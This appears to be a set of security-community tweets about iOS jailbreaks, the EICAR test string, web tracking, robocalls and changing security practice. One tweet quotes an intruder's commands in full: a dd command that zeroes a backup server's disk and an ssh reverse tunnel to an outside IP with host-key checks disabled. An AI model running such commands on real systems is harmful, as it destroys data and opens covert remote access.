X̶̡̛̲̱͈͙̖̥̟̻̻̝̹̏͐͌̈̿̄̉̐̆̄̆͊͑́̚͝͝

FWIW, if you are concerned about jailbreaks decreasing the security of your device, you really shouldn’t be: Modern jailbreaks such as unc0ver do no longer disable the app sandboxes but modify them to add exceptions that are required for the tweaks to load properly.

apparently Apple undid a patch for @NedWilliamson's bug in 12.4?https://twitter.com/Pwn20wnd/status/1163102269518204930 …

brb, changing my password on Facebook to ‘X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*’ to see what happens

Caught the perp in the middle of formatting the backup server: dd if=/dev/zero of=/dev/da0 bs=4194304 seek=1024 count=399559 via: ssh -v -oStrictHostKeyChecking=no -oLogLevel=error -oUserKnownHostsFile=/dev/null aktv@94.155.49.9 -R 127.0.0.1:30081:127.0.0.1:22 -N

Five years ago, my security reviews were full of mitigations mostly abandoned today: selinux, ddos protection, ids, etc. Not that they were bad, but cloud infrastructure and containers have matured way beyond what we could foresee back then, and we're better off.

This 6.5 MB Bloomberg article injects targeted code into your browser and pings back to a suite of mystery servers every few seconds while the page is open. Most of its components serve no obvious purpose. https://www.bloomberg.com/news/features/2018-10-04/the-big-hack-how-china-used-a-tiny-chip-to-infiltrate-america-s-top-companies …

Hey @defcon community: Have you recently been robocalled? We're working on some tech to accurately detect robocalls (I promise it's not #TeleBlaster!). Please send the phone numbers that have robocalled you to // robocalls [at] shadymart [dot] com \\ so we can check them! :)